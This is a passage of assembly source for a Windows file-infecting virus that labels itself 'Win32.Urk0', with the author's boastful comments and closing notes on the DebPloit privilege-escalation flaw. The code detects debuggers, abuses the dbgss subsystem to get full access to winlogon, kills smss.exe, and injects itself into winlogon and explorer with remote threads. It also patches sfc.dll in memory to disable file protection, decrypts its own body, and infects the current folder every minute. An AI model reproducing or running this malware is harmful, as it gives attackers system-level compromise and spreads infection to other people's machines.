;eax = snapshot
;we have create the snapshot and now we will search the module that we need.
sub esp,548
;we will reserve space for MODULEENTRY32
mov dword ptr[esp],548 ;sizeof MODULEENTRY32
mov ecx,eax
;ecx = snapshot
mov [esp + 548 + PROCESSINFORMATIONSIZE + SNAPSHOT],ecx;we save it
mov eax,[esp + 548 + 4 + 200 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE]
;eax = base of kernel
push eax
GezApi eax,Module32FirstCRC,M32FNameLen
mov edx,esp
add edx,4
push edx
push ecx
call eax
pop eax
GezApi eax,Module32NextCRC,M32NNameLen
;eax -> Module32Next
mov [esp + 548 + PROCESSINFORMATIONSIZE],eax ;we save it
NextModule:
;esp + 32 + 256 -> name of module with path(becoz GetModuleFileName gives entire path)
mov esi,esp
add esi,32 + 256
CalcLenString
mov edi,ecx
call CRC32
;eax = CRC of name of module we have got
push eax
mov edi,[esp + 548 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE + 4]
mov esi,esp
add esi,548 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE + 4 + 4
call CRC32
;eax = CRC of our module
pop edx
cmp edx,eax
je FoundModule
push esp
mov ecx,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + SNAPSHOT];we recover snapshot
push ecx
mov eax,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + 4]
;eax -> Module32Next
call eax
jmp NextModule
FoundModule:
;yeah!!!! ;)
mov eax,[esp + 548 + 4 + 200 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE];base kernel
GezApi eax,CloseHandleCRC,CHNameLen
mov ecx,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + SNAPSHOT];we recover snapshot
push ecx
call eax
;snapshot closed
;now we recover information for returning parameters and ret ;)
mov ecx,[esp + 20]
mov edx,[esp + 24]
mov eax,[esp + 548]
mov esi,[esp + 548 + 4]
mov ebx,[esp + 548 + 8]
mov edi,[esp + 548 + 12]
add esp,548 + 16 + 68 + 4 + 200 + 4
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;GetExplorer
;In:
; eax = base of kernel
; esi -> buffer for storing name
;Out:
; esi ->buffer
; ecx = bytes of name
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetExplorer:
push esi
GezApi eax,GetWindowsDirectoryACRC,GWDNameLen
;eax -> GetWindowsDir
pop esi
push esi
push 200
push esi
call eax
pop esi
CalcLenString
mov edi,esi
add edi,ecx
mov byte ptr [edi],'\'
inc edi
mov dword ptr [edi],'LPXE'
add edi,4
mov dword ptr [edi],'RERO'
add edi,4
mov dword ptr [edi],'EXE.'
add edi,4
mov dword ptr [edi],0
CalcLenString
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;DetectSICE try to detect softice,and in the case softice was detected,then stop execution.
;in:
; eax = kernel base
;out:
; none
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
DetectSICE:
pushad
push eax
;check sice in 9x
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 0c0000000h
lea esi,[ebp + SICE9X]
push esi
GezApi eax,CreateFileACRC,CFNameLen
call eax
inc eax
jz NoSICE9X
call $
NoSICE9X:
mov eax,[esp]
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 0C0000000h
lea esi,[ebp + SICENT]
push esi
GezApi eax,CreateFileACRC,CFNameLen
call eax
inc eax
jz NoSICENT
call $
NoSICENT:
pop eax
popad
ret
SICE9X db "\\.\SICE",0
SICENT db "\\.\NTICE",0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;NT ZONE !¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!
;NT ZONE !¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!
;NT ZONE !¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!
;NT ZONE !¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!
;NT ZONE !¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!¡!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Well...now we are in NT.We will fight agresively against NT for
;getting full privileges ;/ Virus its very different if we are
;in NT.Here we dont load and dont inject code to explorer.exe.
;Here we will try to get full privileges with some methods
;and later we will infect files.
;NT part works in this manner: i try to get anough privileges to open winlogon and
;inject code there(with i WannaCanDebug).If i dont get anough,i use a second method.
;I use a flaw in NT.I havent discovered that flaw.I speaking about Debploit method.
;You can search about this in www.securiteam.com in NT focus.With this,i connect to
;dbgss and i say it that it gives me a duplicate handle to winlogon,however,it will
;give me it with full privileges :D ... There is a problem with this...If i say
;dbgss i am the debugger of winlogon,and winlogon is my debugee process(i attach
;it) when my process terminated,winlogon will finish too and system will reboot.
;For this reason,when i infect winlogon,since winlogon injected code,i kill smss
;(where is implemented dbgss) and smss will not kill winlogon.In this manner,only first
;infected file executed will inject code in winlogon becoz when second infected program
;was executed,it will not find dbgss.
;In winlogon,virus disable sfp with Ratter and Benny method(29a number 6).Later,it
;gets a handle to explorer and inject code there,and create a remote thread in
;explorer:There,ExplorerCode is executed.This code will infect current folder of
;explorer.exe each 60 seconds.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;NTInvasion try to KILL NT ;O
;in:
; eax = kernel base
;out:
; none
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
NTInvasion:
mov ecx,cs
xor cl,cl
jecxz ContinueNT
ret
ContinueNT:
mov [ebp + NtKernel],eax
callz GetLibrarys
callz DebuggerTrickz
callz FreeLibrarys
ret
NtKernel dd 0
NtAdvapi dd 0
NtPsapi dd 0
NtRasapi dd 0
Ntdll dd 0
;;;;;;;;;;;;;;;;;;;;
GetLibrarys:
pushad
;first,ill try to get ntdll base from PEB structure
mov eax,dword ptr fs:[30h] ;PEB pointer
mov eax,dword ptr [eax + 0ch] ;PEB_LDR_DATA
mov eax,dword ptr [eax + 1ch] ;LIST_ENTRY
mov eax,dword ptr [eax + 8h] ;ntdll.dll base
mov [ebp + Ntdll],eax
mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
push eax
lea ebx,[ebp + advapi]
push ebx
call eax
mov [ebp + NtAdvapi],eax
lea ebx,[ebp + psapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtPsapi],eax
lea ebx,[ebp + rasapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtRasapi],eax
pop eax
popad
ret
advapi db 'advapi32.dll',0
psapi db 'psapi.dll',0
rasapi db 'rasapi32.dll',0
;;;;;;;;;;;;;;;;;;;;
FreeLibrarys:
pushad
mov eax,[ebp + NtKernel]
GezApi eax,FreeLibraryCRC,FLNameLen
push eax
push dword ptr [ebp + NtAdvapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtPsapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtRasapi]
call dword ptr [esp + 4]
pop eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;DebuggerTrickz try to gain privileges.
;in:
; none
;
;out:
; eax = 1 no error eax = 0 error
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
DebuggerTrickz:
pushad
or eax,eax
jz NoTrickGoOut
callz GetWinlogon
or eax,eax
jz ContinueTrick
NoTrickGoOut:
popad
ret
ContinueTrick:
;now i have a handle to winlogon.exe...however i only have this access:
;PROCESS_VM_READ and PROCESS_QUERY_INFORMATION
;now we need a handle to the process but with VM_WRITE,...privileges.
;ill try to open Winlogon with full privileges...if i dont get it
;with full privileges ill use same method as debploit exploit.
;You can read about this in www.securiteam.com NT focus...
;in august of 2002 if i remember well.
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
push dword ptr [ebp + WinlogonID]
push 0
push 43Ah;privileges i need
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen
call eax
or eax,eax
jz Debploit
sub esp,80h
callz AttackWinlogon ;)
or eax,eax
jz DebuggerNoError
jmpz DebuggerError
Debploit:
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
mov ecx,20h
SaveSpaceMESSAGE:
push 00000000h
loop SaveSpaceMESSAGE ;space for DBG_SS_CP_LPC_MESSAGE
mov eax,[ebp + Ntdll]
GezApi eax,NtConnectPortCRC,NCPNameLen
push 0
push 0
push 0
push 0
push 0
lea ebx,[ebp + SECURITY_QUALITY_OF_SERVICE]
push ebx
lea ebx,[ebp + USbuf]
mov [ebp + PUSbuf],ebx
push eax
mov eax,ebx
xor edx,edx
mov ebx,2
div ebx
or edx,edx
jz NoAlign
lea ebx,[ebp + USbuf2]
mov [ebp + PUSbuf],ebx
NoAlign:
pop eax
;well...here we have a problem...read about NTSTATUS_DATATYPE_MISALIGNMENT
;(80000002h)for knowing this problem and you will discover how Microsoft
;do a easier life for you :P Why i must align a data for giving
;parameters to a api...WHYYYYY??? Why M$,the richest company in the world,
;cannot do a S.O that aligns my datas!!??? :( Why i must spend two days
;trying to solve this problem!!!! damn ;(
lea ebx,[ebp + UNICODE_STRING]
push ebx
lea ebx,[ebp + PortHandle]
push ebx
call eax;ZwConnectPort
;note i call apis from ntdll.dll with a call instead a syscall...however they can be
;called with a syscall too.
cmp eax,080000000h
jae DebuggerError
mov eax,[ebp + Ntdll]
GezApi eax,DbgUiConnectToDbgCRC,DUCTDNameLen
call eax
cmp eax,080000000h
jae DebuggerError
;for now,all right...now i must send a message to dbgss,
;a create process request,and it will give me a duplicated handle
;to the process that ill specify in the message...with a small
;different...this handle will have PROCESS_TERMINATE,
;PROCESS_CREATE_THREAD!!!,PROCESS_VM_READ,
;PROCESS_VM_OPERATION,PROCESS_VM_WRITE!!!,PROCESS_DUP_HANDLE,
;PROCESS_QUERY_INFORMATION,READ_CONTROL privileges ;D
;we have already reserved space for DBG_SS_CP_LPC_MESSAGE
;in the stack in the start of debploit zone.You can see
;DBG_SS_CP_LPC_MESSAGE struct in the end of virus code
mov word ptr [esp],38h ;DataSize
mov word ptr [esp + 2h],80h ;MessageSize
mov dword ptr [esp + 18h],2h ;CREATE_PROCESS_REQUEST
mov eax,[ebp + WinlogonID]
mov dword ptr [esp + 20h],eax ;debugee PID...that i want duplicate handle
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentProcessIdCRC,GCPINameLen
call eax
mov dword ptr [esp + 2ch],eax ;debugger PID...me
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentThreadIdCRC,GCTINameLen
call eax
mov dword ptr [esp + 30h],eax ;debugger TID...me too
push esp
push dword ptr [ebp + PortHandle]
mov eax,[ebp + Ntdll]
GezApi eax,ZwRequestPortCRC,ZRPNameLen
call eax
;now we dont need msg space reserved in stack so we use that space in
;stack for or DEBUG_EVENT
WaitEvent:
push 512
;esp + 4 -> DEBUG_EVENT
mov eax,esp
add eax,4
push eax
mov eax,[ebp + NtKernel]
GezApi eax,WaitForDebugEventCRC,WFDENameLen
call eax
mov eax,[esp + 4] ;dwProcessId
mov ebx,[esp + 8] ;dwThreadId
push 00010002h ;CONTINUE_DEBUG
push ebx
push eax
mov eax,[ebp + NtKernel]
GezApi eax,ContinueDebugEventCRC,CDENameLen
call eax
cmp dword ptr [esp],3 ;DugEventCode == CREATE_PROCESS_DEBUG_EVENT???
je GoodEvent
jmpz WaitEvent
GoodEvent:
;we have got the waited debug event and there
;we can find the duplicate handle to winlogon :D
mov eax,[esp + 10h] ;DEBUG_EVENT.u.CreateProcessInfo.hProcess
mov [ebp + WinlogonHand],eax ;we save the handle with full acess to winlogon
;now i have a problem.When this process terminates,winlogon will terminate too becouse
;winlogon is the debuggee process and this is the debugger.
;i think a dramatic solution...terminate smss.exe.smss initiates winlogon and win32 subsystem
;and when system hangs,it take the control and draw the blue screen of death :P.In addition
;it has implemented the dbgss.If only these are their functions,we can terminate smss and in
;this manner smms will not terminate winlogon after my process terminates...in addition we
;have broke debug subsystem ;)
;Ill do this since winlogon later i inject my code there.
;note if smss is terminated,next time virus will be executed it will not find dbgss subsystem
;and by this reason it will not infect winlogon again.
callz AttackWinlogon
or eax,eax
jnz DebuggerError
DebuggerNoError:
add esp,80h
popad
xor eax,eax
inc eax
ret
DebuggerError:
add esp,80h
popad
xor eax,eax
ret
PortHandle dd 0
UNICODE_STRING:
USlen dw 26
USmaxlen dw 28
PUSbuf dd 0
db 0
;i have two strings becoz if USbuf is not alignmented then USbuf2 is it.
USbuf dw '\','D','b','g','S','s','A','p','i','P','o','r','t',0
db 0
USbuf2 dw '\','D','b','g','S','s','A','p','i','P','o','r','t',0
SECURITY_QUALITY_OF_SERVICE:
SQOSlen dd 12
ImpersonationLevel dd 2;SecurityImpersonation
ContextTrackingMode db 1
EffectiveOnly db 1
db 34h
db 00h
;;;;;;;;;;;;;;;;;;;;;
GetWinlogon: ;in:none out: WinlogonHand with winlogon process handle
; eax = 0 if no error
pushad
mov ecx,200h
SaveSpaceSearchingWinlogon:
push 00000000h
loop SaveSpaceSearchingWinlogon
;esp -> array of id of processes
mov eax,esp
lea ebx,[ebp + Needed]
push ebx
push 4*200h
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessesCRC,EPSNameLen
call eax
dec eax
jnz GetWinlogonOutError_
;esp -> array
mov esi,esp
lodsd
SearchWinlogon:
lodsd
push esi
or eax,eax
jz GetWinlogonOutError
;vvv
mov [ebp + WinlogonID],eax
push eax
push 0
push 10h or 400h
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen
call eax
or eax,eax
jz NoWinlogonFound
;eax = process handle
mov [ebp + WinlogonHand],eax
lea ebx,[ebp + Needed]
push ebx
push 4
lea ebx,[ebp + WinlogonModuleHand]
push ebx
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessModulesCRC,EPMNameLen
call eax
dec eax
jnz NoWinlogonFound
push 50
lea eax,[ebp + WinlogonModuleName]
push eax
push dword ptr [ebp + WinlogonModuleHand]
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtPsapi]
GezApi eax,GetModuleBaseNameACRC,GMBNNameLen
call eax
lea esi,[ebp + WinlogonModuleName]
lodsd
or eax,20202020h
cmp eax,'lniw'
winl equ $ - 4
jne NoWinlogonFound
lodsd
or eax,20202020h
cmp eax,'nogo'
ogon equ $ - 4
jne NoWinlogonFound
;^^^
WinLogonFound:
pop esi
GetWinlogonOut:
add esp,4*200h
popad
xor eax,eax
ret
NoWinlogonFound:
pop esi
jmp SearchWinlogon
GetWinlogonOutError:
pop esi
GetWinlogonOutError_:
add esp,4*200h
popad
xor eax,eax
inc eax
ret
;;;;;;;;;;;;;;;;;;;;;
AttackWinlogon: ;in:none
;out: eax = 1 error eax = 0 no error
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push EVirus - SVirus
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,VirtualAllocExCRC,VANameLen
call eax
or eax,eax
jz AttackWinlogonError
mov [ebp + WinlogonVirusBase],eax
mov ecx,[ebp + NtKernel]
mov ebx,[ebp + WinlogonHand]
lea edx,[ebp + SVirus]
mov esi,EVirus - SVirus
Writez ecx,ebx,eax,edx,esi
or eax,eax
jz AttackWinlogonError
push 0
push 0
lea eax,[ebp + Needed]
push eax;pointer to a variable to be passed to the thread function
mov eax,[ebp + WinlogonVirusBase]
add eax,WinlogonCode - SVirus
push eax
push 0 ;stack size
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CreateRemoteThreadCRC,CRTNameLen
call eax
or eax,eax
jz AttackWinlogonError
AttackWinlogonNoError:
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
ret
AttackWinlogonError:
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
inc eax
ret
Needed dd 0
WinlogonModuleHand dd 0
WinlogonModuleName db 50 dup(0)
WinlogonHand dd 0
WinlogonID dd 0
WinlogonVirusBase dd 0
SmssHand dd 0
ExplorerHand dd 0
ExplorerID dd 0
ExplorerVirusBase dd 0
ExplorerModuleHand dd 0
db "Win32.Urk0 Coded By ValleZ",0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
WinlogonCode:
;When i inject code to winlogon,i create a remote thread that will start execution here
pop eax ;remove parameter passed
callz WinlogonCodeDoff
WinlogonCodeDoff:
pop ebp
sub ebp,offset WinlogonCodeDoff
callz GetLibrarys
mov dword ptr [ebp + winl],'lpxe'
mov dword ptr [ebp + ogon],'rero'
callz GetWinlogon ;i use same function to get smss.exe handle and terminate it.
mov eax,[ebp + WinlogonHand]
mov [ebp + ExplorerHand],eax
mov eax,[ebp + WinlogonID]
mov [ebp + ExplorerID],eax
mov eax,[ebp + WinlogonModuleHand]
mov [ebp + ExplorerModuleHand],eax
mov dword ptr [ebp + winl],'ssms'
mov dword ptr [ebp + ogon],'exe.'
callz GetWinlogon ;i use same function to get smss.exe handle and terminate it.
mov eax,[ebp + WinlogonHand]
mov [ebp + SmssHand],eax
mov dword ptr [ebp + winl],'lniw'
mov dword ptr [ebp + ogon],'nogo'
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
push dword ptr [ebp + WinlogonID];really smss.exe ID
push 0
push 1h;privileges that i need for terminating smss.exe
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen ;i open smss.exe
call eax
push 0
push dword ptr [ebp + SmssHand]
mov eax,[ebp + Ntdll]
GezApi eax,NtTerminateProcessCRC,NTPNameLen
call eax
;i have terminated smss.exe and now it cannot kill winlogon ;D i dont know if this method
;is a few dramatic...i know if i kill smss.exe i fuck dbgss(mmm im thinking then im
;fuckin debbugers :-m ),and when windows terminates with error smss will not show
;the typical blue screen(this is a problem???)...i dont know if i am fuckin other
;importants parts...i have not read others funcionalitys...only it loads winlogon
;and win32 subsystem(csrss.exe),however this task is already done.I think i can
;kill smss.exe.
;now,i am in w1nl0g0n with M4x Pr1v1l3g3s ;D in this point our imagination will do all
;first,i will disable sfp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SfcDisable:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + sfc]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
call eax
or eax,eax
jz ErrorSfcDisable
mov [ebp + NtSfc],eax
mov esi,[eax + 3ch]
add esi,eax
;esi -> PE
movzx eax,word ptr [esi + 14h];size of optional
mov ecx,[eax + esi + 18h + 10h];size of section
mov esi,[eax + esi + 18h + 0ch];virtual address of first section of sfc.dll
add esi,dword ptr [ebp + NtSfc]
;esi -> code section
SearchCodeToPatch:
pushad
lea edi,[ebp + CodeToSearch]
mov ecx,11
rep cmpsb
popad
je CodeToPatchFound
inc esi
loop SearchCodeToPatch
jmpz ErrorSfcDisable
CodeToPatchFound:
;now we patch code with a call to ExitThread
push esi
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
pop esi
mov [ebp + PatchExitThreadDir],eax
push esi
;i unprotect the mem where i go to patch
;UnprotectMem
; eax -> base of kernel
; esi -> dir of memory that will be writable.
; ecx -> bytes of that memory.
; ebx -> handle of the process where is the memory.If 0 this process
mov eax,[ebp + NtKernel]
mov ebx,0
mov ecx,_PatchCode - PatchCode
callz UnprotectMem
pop esi
mov edi,esi
lea esi,[ebp + PatchCode]
mov ecx,_PatchCode - PatchCode
PatchIt:
movsb
loop PatchIt
ErrorSfcDisable:
;if we have jumped here without executing CodeToPatchFound part,sfc is not disabled
;now ill infect files
;first all,ill uncrypt since SCode to SCode part
;we encrypted Code with random key since FFFF0000h to FFFFFFFFh so
;now we must search the key using brute force
xor ecx,ecx
mov edx,dword ptr [ebp + SCode]
WLWhatKey:
xor edx,ecx
cmp edx,000000E8h
je WLKeyFound
xor edx,ecx
loop WLWhatKey
WLKeyFound:
mov edx,ecx
;edx = key
mov ecx,(ECode - SCode)/4
lea esi,[ebp + SCode]
WLUncrypt:
dec ecx
xor dword ptr [esi + 4*ecx],edx
or ecx,ecx
jnz WLUncrypt
mov eax,[ebp + NtKernel]
mov [ebp + kernel],eax ;code since SCode to ECode uses kernel variable so
;i must initializate it
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
AttackExplorer:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;now ill inject the code to explorer.exe from winlogon and there ill hook CreateFileA api ;)
;i thought to hook FindFirstFile and FindNextFile in explorer but i think its anought
;with CreateFileA
push dword ptr [ebp + ExplorerHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
push dword ptr [ebp + ExplorerID]
push 0
push 43ah;privileges that i need
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen
call eax
or eax,eax
jz AttackExplorerError
mov [ebp + ExplorerHand],eax
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push EVirus - SVirus
push 0
push dword ptr [ebp + ExplorerHand]
mov eax,[ebp + NtKernel]
GezApi eax,VirtualAllocExCRC,VANameLen
call eax
or eax,eax
jz AttackExplorerError
mov [ebp + ExplorerVirusBase],eax
mov ecx,[ebp + NtKernel]
mov ebx,[ebp + ExplorerHand]
lea edx,[ebp + SVirus]
mov esi,EVirus - SVirus
Writez ecx,ebx,eax,edx,esi
or eax,eax
jz AttackExplorerError
push 0
push 0
lea eax,[ebp + Needed]
push eax ;pointer to a variable passed as parameter to thread function
mov eax,[ebp + ExplorerVirusBase]
add eax,ExplorerCode - SVirus
push eax
push 0;stack size
push 0
push dword ptr [ebp + ExplorerHand]
mov eax,[ebp + NtKernel]
GezApi eax,CreateRemoteThreadCRC,CRTNameLen
call eax
AttackExplorerError:
push dword ptr [ebp + ExplorerHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ExitWinlogonThread:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
push 0
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
call eax
sfc db 'sfc.dll'
NtSfc dd 0
CodeToSearch db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h
PatchCode:
push 0
mov eax,11111111h
PatchExitThreadDir equ dword ptr $ - 4
call eax
_PatchCode:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ExplorerCode:
callz NtExplorerDOffset
NtExplorerDOffset:
pop ebp
sub ebp,offset NtExplorerDOffset
CurrentFolderInfection:
mov eax,[ebp + NtKernel]
GezApi eax,SleepCRC,SNameLen
push 60000 ;1 minute
call eax ;Sleep for 1 minute
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentDirectoryACRC,SCDNameLen
lea ebx,[ebp + buffy]
push ebx
push 256
call eax
lea ebx,[ebp + buffy]
callz InfectCurrentFolder
jmpz CurrentFolderInfection
;since explorer,virus will infect current folder in intervals of 1 minute
buffy db 256 dup (?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Pad2:
PADDING2 equ 4 - (((Pad2 - ECode) - (4*((Pad2 - ECode)/4))))
db PADDING2 dup (0)
EVirus:
end start
end
HERE YOU CAN FIND SOME EXTRA INFORMATION FOR VIRUS UNDERSTANDING
DebPloit allows Everyone to get handle to Any process or thread.
Handles have enough access to promote everyone to system/admin
(in the case Target is running under LocalSystem, Administrator account).
Works on: Any MS Windows NT 4.0, Windows 2000 (SPs before Mar-12-2002).
Former NTs weren't tested. Discovered: Mar-09-2002. Author: Radim "EliCZ" Picha.
Bugs@EliCZ.cjb.net. http://www.anticracking.sk/EliCZ. Details: Exploit\DebPloit.h.
Principle: Ask debugging subsystem (lives in smss.exe) to create (duplicate) handle(s)
to Target for you:
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to DbgSsApiPort LPC port (ZwConnectPort).Everyone has access to this port.
3. Ask dbgss to handle CreateProcess SsApi with client id (or pid or tid only)
of Target (ZwRequestPort).
